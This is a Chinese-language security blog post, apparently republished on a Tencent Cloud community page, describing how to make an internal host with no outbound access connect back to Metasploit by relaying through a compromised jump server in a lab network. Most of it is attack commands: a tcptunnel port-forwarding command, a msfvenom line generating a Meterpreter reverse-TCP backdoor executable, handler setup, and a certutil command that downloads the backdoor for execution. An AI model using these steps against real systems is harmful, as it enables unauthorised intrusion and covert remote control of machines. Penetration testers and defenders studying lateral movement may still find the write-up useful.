前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >利用 TCP 隧道让内网不出网主机上线 MSF

利用 TCP 隧道让内网不出网主机上线 MSF

作者头像
信安之路
发布2022-04-07 16:09:26
2K0
发布2022-04-07 16:09:26
举报
文章被收录于专栏:信安之路信安之路

在获得一台内网跳板机权限之后,想让相同内网其他主机上线 MSF,由于只有跳板机可以出网,如何能让其他不出网主机通过跳板机上线 MSF 呢?

今天测试的环境如下:

内网网段:192.168.142.0/24 跳板机 IP:192.168.142.110 不出网主机 IP:192.168.142.113(windows 2008 x64) 攻击机网段:192.168.0.0/24 MSF IP:192.168.0.12(可以是任意公网 IP)

接下来使用的建立 TCP 隧道的工具 tcptunnel,项目的地址:

https://github.com/vakuum/tcptunnel

下载源码,可以在与跳板机相同的系统上编译,然后将编译好的程序上传至跳板机执行。执行名:

代码语言:javascript
复制
./tcptunnel --local-port=1080 --remote-port=4444 --remote-host=192.168.0.120 --fork --buffer-size=8192 --stay-alive

命令执行成功之后,会监听 1080 端口,然后将该端口收到的所有数据转发至 192.168.0.120 的 4444 端口。

接下来使用 msfvenom 生成一个后门:

代码语言:javascript
复制
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.110 lport=1080 -f exe -o shell.exe

远程连接的 IP 填跳板机的 IP,端口填 1080,然后使用 msf 监听端口 4444:

代码语言:javascript
复制

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.0.120
LHOST => 192.168.0.120
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run -j

接下来将生成好的后门,上传至不出网主机,跳板机是个 web 服务器,将后门文件先上传至跳板机,然后在不出网主机上执行命令,从跳板机下载后门执行:

代码语言:javascript
复制
certutil.exe -urlcache -split -f http://192.168.142.110/hackable/uploads/shell.exe

然后执行 shell.exe,发现 msf 上线了:

切换到 meterpreter 查看 IP:

至此问题解决,通过跳板机建立 TCP 隧道,然后让不出网主机通过跳板机上线。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-02-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安之路 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档